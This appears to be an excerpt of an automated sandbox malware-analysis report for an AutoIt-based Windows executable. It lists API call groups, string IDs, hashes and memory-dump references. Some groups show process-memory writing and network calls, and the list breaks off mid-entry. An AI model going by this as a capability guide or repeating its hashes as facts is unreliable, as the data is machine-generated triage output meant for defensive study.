                                                                                          • API String ID: 3401586794-0
                                                                                          Similarity
                                                                                          • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                          • String ID: DllGetClassObject
                                                                                          • API String ID: 668425406-1075368562
                                                                                          Similarity
                                                                                          • API ID: LongMessageSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3360111000-0
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          Similarity
                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                          • String ID:
                                                                                          • API String ID: 161812096-0
                                                                                          Similarity
                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 395352322-0
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          Similarity
                                                                                          • API ID: AllocByteCharMultiStringWide
                                                                                          • String ID:
                                                                                          • API String ID: 3603722519-0
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 1025951953-3636473452
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3220332590-0
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: f$p
                                                                                          • API String ID: 3215553584-1290815066
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                          • String ID:
                                                                                          • API String ID: 3859894641-0
                                                                                          Similarity
                                                                                          • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 564229958-0
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                          • API String ID: 0-2263619337
                                                                                          Similarity
                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                          • String ID:
                                                                                          • API String ID: 2592858361-0
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          Similarity
                                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2082702847-0
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          Similarity
                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                          • String ID:
                                                                                          • API String ID: 43455801-0
                                                                                          • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                          • Instruction ID: 92c3dc659fa529871d270ccf2e069da1881886c78b860cdff17e6f7a83bcf9f5
                                                                                          • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                          • Instruction Fuzzy Hash: 5A11BF31B1C286C2E714BB16B80C768EB60EB89B94F884534CF8603B60EF7EE444CB50
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                          • Instruction ID: 54941a95ab0ef6b4b6f4e7e31bfb5161bd2f93343836fffd9313429c0832fd8e
                                                                                          • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                          • Instruction Fuzzy Hash: 1611306290D684CAD358EF39DC4C2197BB2FB5CB08B948434C2598F275FE39D49AC710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                          • Instruction ID: c685810c7f71bdf86a9fd1163d27cab3fd0210a87f4426bfe7695502966d923a
                                                                                          • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                          • Instruction Fuzzy Hash: BE015A72A1C785C3EB10AB21A81CA29A361AB8DB95F845434CA8A07B24EF7CD0488B10
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                          • Instruction ID: f21a28af6d3f6cb46bdcd409d3620bb01afaa67c3f178157ff4c33e7551a5179
                                                                                          • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                          • Instruction Fuzzy Hash: D9F06920F1C756C3FB50BB61A84DB29A2A2BF8D744FC44435D98A03A60EE3CD0848A20
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                          • Instruction ID: 86dfed4cf6ee92278d453fc7f486a5b5a02bc53f8758d24559b799162c9f8903
                                                                                          • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                          • Instruction Fuzzy Hash: A2F0F821A1CA05C2EB04FB76E85D128A361EB8DFA5B444535CD9E47374EE3CD4958310
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 1653399731-2785691316
                                                                                          • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                          • Instruction ID: 8e22d4dabcfba0ecbc75311160524e1ed4507c81de43af26bd06f060ca500fa5
                                                                                          • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                          • Instruction Fuzzy Hash: BCB13A32A0CA41CAE714EF65D4801ADB7B5FB84798F900135EE8D57B68EF38E545CB50
                                                                                          APIs
                                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF74D0CBF47), ref: 00007FF74D0CCE29
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: BuffCharLower
                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                          • API String ID: 2358735015-567219261
                                                                                          • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                          • Instruction ID: 69bd1c228d9c9968eef07c0425f807922a51ccdb046e2dd02146713a87c9490f
                                                                                          • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                          • Instruction Fuzzy Hash: EF91D522F1C652C1EA68BF2AD44057DA3A1BB15B90B904531DE9D937A4FF3DE852D320
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                          • API String ID: 4237274167-1221869570
                                                                                          • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                          • Instruction ID: 9d07687e64ce945d8bb3ef6a783f93ce885f7d988beefc1f3a0dc8abced07d9e
                                                                                          • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                          • Instruction Fuzzy Hash: 0D916B26B0DB42C6EB24FF65D0442ADB3A4EB88B98BC54432DE8D57765EF38E445C360
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00007FF74D0A0EDB
                                                                                            • Part of subcall function 00007FF74D0A0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF74D0A0F61), ref: 00007FF74D0A0C6A
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: BuffCharForegroundUpperWindow
                                                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                          • API String ID: 3570115564-1994484594
                                                                                          • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                          • Instruction ID: 568198258d1397e31e0aacdfe4feff86dd971b82bc19b27b84ccea774625a7e5
                                                                                          • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                          • Instruction Fuzzy Hash: 2C719D12F0DA43C2EA64BB65E4112BDE2E1AF64784FC44431DA8D877A5FF7CE5448231
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper
                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                          • API String ID: 3964851224-769500911
                                                                                          • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                          • Instruction ID: 0b32bf86902a199e349030c8d50fe3b290830acb22209d7e77bef9e50d7aa683
                                                                                          • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                          • Instruction Fuzzy Hash: 0D41C522F1DA53C1EA607B69A445179E2D1AB35BD0BD40631CADD87BA4FE6DE8428330
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: #$E$O
                                                                                          • API String ID: 3215553584-248080428
                                                                                          • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                          • Instruction ID: 31a55c7654bde3ebd8850b83d5111459f3269d6b8e726b542d40ab2da3904f9d
                                                                                          • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                          • Instruction Fuzzy Hash: AD418F22B1D751C4EF51BFA1A9401ADA3E0BF55B98F884131EE8D07BA9EF3CE4518320
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 3196045410-1173974218
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 787153527-1403004172
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3113390036-3916222277
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 4146253029-1011021900
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          Similarity
                                                                                          • API ID: ErrorLasthtonsinet_ntoa
                                                                                          • String ID:
                                                                                          • API String ID: 2227131780-0
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3488606520-0
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 3451389628-0
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 3659116390-0
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                          • String ID:
                                                                                          • API String ID: 3740051246-0
                                                                                          • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                          • Instruction ID: 56d0817108c6a8093186fd56267b6926a5e74241d3e6a61c4b49d5a6f4be4be7
                                                                                          • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                          • Instruction Fuzzy Hash: 44616022A0CA86C6EB10FB65E4943BDB760FB84784F804132EA8D47A7AEF7CD545C750
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD176
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD217
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD236
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD281
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D0CC2BF), ref: 00007FF74D0CD2A0
                                                                                            • Part of subcall function 00007FF74D054120: WideCharToMultiByte.KERNEL32 ref: 00007FF74D054160
                                                                                            • Part of subcall function 00007FF74D054120: WideCharToMultiByte.KERNEL32 ref: 00007FF74D05419C
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                          • String ID:
                                                                                          • API String ID: 666041331-0
                                                                                          • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                          • Instruction ID: 55dfae356591f853cbaf4272cb8478b135c7ed0279cd941d2394faeb5a42bbe3
                                                                                          • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                          • Instruction Fuzzy Hash: 7C512836A1CB16C6EB04FF66D9941ACA3A4FB98F84B854432DE9E47365EF78D441C320
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                          • String ID:
                                                                                          • API String ID: 4136290138-0
                                                                                          • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                          • Instruction ID: fd1eef9bcc6d8fd902be2b5a828aedfdece5b706576625678148067767ceb0a7
                                                                                          • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                          • Instruction Fuzzy Hash: A8515677629A45D2DB50EF15D4887AD73B8FB94B80F828222CB8D47764EF39E458C710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                          • Instruction ID: 0aeaf8c9646318a038954939b950f96bfc08526decacd2d255e583749901657c
                                                                                          • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                          • Instruction Fuzzy Hash: CF518222A0C782D6EA60BF219444179F7A5EF44BA0F994235DAED0B6F5EE3CE451C720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                          • String ID:
                                                                                          • API String ID: 2832842796-0
                                                                                          • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                          • Instruction ID: 38958001f6d4729c669ad5873b4866aeda444a4061c01c8d2e73dc6daa998169
                                                                                          • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                          • Instruction Fuzzy Hash: C7510926A1CA46C2DB14FF26E494269B7A0FB89F94B448432EE8E47766DF7CD440C760
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                          • String ID:
                                                                                          • API String ID: 4210589936-0
                                                                                          • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                          • Instruction ID: d5dab58ba48fca850889399c2dc1f0cab3a7499c767d0c7ca045c8939a4fd8e4
                                                                                          • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                          • Instruction Fuzzy Hash: ED51DD36B0C682CBE758FF3195446A9B7A1FB4A794F400231EAAE477E5DF38E4518720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID:
                                                                                          • API String ID: 190572456-0
                                                                                          • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                          • Instruction ID: 353de3cc471d21237ab31c5e8f0d777e53d0d003eddd6e80d800d20b0d0c6cb1
                                                                                          • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                          • Instruction Fuzzy Hash: 7841E8A1B1DA06C1FA11BF96A8042B6E395BF48BE0F895535DD9D4B3A8FE7CE4008310
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable
                                                                                          • String ID:
                                                                                          • API String ID: 2939132127-0
                                                                                          • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                          • Instruction ID: 0ed6c23a3166c63a6dda24607148f54cc831bca3c635a897e0e165e89bbb3d4a
                                                                                          • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                          • Instruction Fuzzy Hash: 7A514332A0EA8AC1EB55FB15D45867CB760EB88B44F994132DE8D17BB0EE3DE441D720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3382505437-0
                                                                                          • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                          • Instruction ID: e9479091ed42369e10f89ed6cfe28777d0fc86beba97f3a37ef4dbfac46a42b2
                                                                                          • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                          • Instruction Fuzzy Hash: E631D93660C64587E710FF29E44826DB391F749B98F800135EEDD877A4DE7CE8418710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                          • String ID:
                                                                                          • API String ID: 2256411358-0
                                                                                          • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                          • Instruction ID: 0d955465c4687a6196ad9bdc85c4f3bf80eef0aa3f846f41abbdf4359f32f1c2
                                                                                          • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                          • Instruction Fuzzy Hash: B9419021E0DA87C5FF60BB54A8487B9A690EF44B44FE80135D8CD471B5FE7DE4448B21
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                          • String ID:
                                                                                          • API String ID: 2655805287-0
                                                                                          • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                          • Instruction ID: 327a35809bbc9510def4e807e1c0da662b4ac802efd0f59d7673bbd360ea03a0
                                                                                          • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                                                          • Instruction Fuzzy Hash: 54219722B0D682C5EB54FB12A919279A690BF89FE0F854931EE9D477A5FE3CD4508320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B003C
                                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B0047
                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B0055
                                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF74D0B005E
                                                                                            • Part of subcall function 00007FF74D0AF7B8: CloseHandle.KERNEL32(?,?,?,00007FF74D0B0063,?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0AF7C9
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF74D0929AD,?,?,?,00007FF74D042AB2), ref: 00007FF74D0B006A
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2625713937-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastThread
                                                                                          • String ID:
                                                                                          • API String ID: 1611280651-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 3769357847-24824748
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                          • API String ID: 3215553584-1196891531
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: $*
                                                                                          • API String ID: 3215553584-3982473090
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID: !$acos
                                                                                          • API String ID: 1156100317-2870037509
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID: !$asin
                                                                                          • API String ID: 1156100317-2188059690
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4150878124-2766056989
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                          • String ID: P
                                                                                          • API String ID: 135850232-3110715001
                                                                                          • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                          • Instruction ID: cb4e2ed7468171535da46f455ed9ae996324437169aea4180f402ee318868319
                                                                                          • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                          • Instruction Fuzzy Hash: 5E418322A0CA81C1EB51FB15D4443ADA761EB94BA4F968231DAAD477E1EF3CD542C730
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                          • String ID: U
                                                                                          • API String ID: 2456169464-4171548499
                                                                                          • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                          • Instruction ID: 60221ec5999a93c7d07ce03e6f2d65139dba9dd376a41a2b6b3abc1b0eb03243
                                                                                          • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                          • Instruction Fuzzy Hash: 6B418F22B1D745C2DB20AF65E4443AAB7A1FB88794F848031EE8E877A8EF7CD441C750
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                          • Instruction ID: 2cd84c145f9003b02bec2385add7c38cca59bcefa95879f35b271584f2b208da
                                                                                          • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                          • Instruction Fuzzy Hash: 9D413E32A0D782C7E770AB18E444B9AB7A1F784764F544335DAA803AA9DF3CD845CF50
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                                          • String ID: SysMonthCal32
                                                                                          • API String ID: 2671490118-1439706946
                                                                                          • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                          • Instruction ID: da0da1028e1fa92c4256598b274460a0ff197e4d9f530613c8b32beec2c0572f
                                                                                          • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                          • Instruction Fuzzy Hash: CC415C3260C6C2CBE370EF15E444B5AB7A1FB88790F504225EAE903A99EF3DD4858F40
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 1752125012-2298589950
                                                                                          • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                          • Instruction ID: 0aa83c7e3712fe1e33f321fcb66effc7376b85456a563542e8d68676ac42a498
                                                                                          • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                          • Instruction Fuzzy Hash: DF319F32A1CB85C6EB60EB15E4543AAB361FB85B91F908136DA8D43BA4DF3CD444CB10
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                          • String ID: Listbox
                                                                                          • API String ID: 3747482310-2633736733
                                                                                          • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                          • Instruction ID: 562104d6a106c33aa548e613304c14c8dff233ba0cdbbc824ee85b0ead8648a4
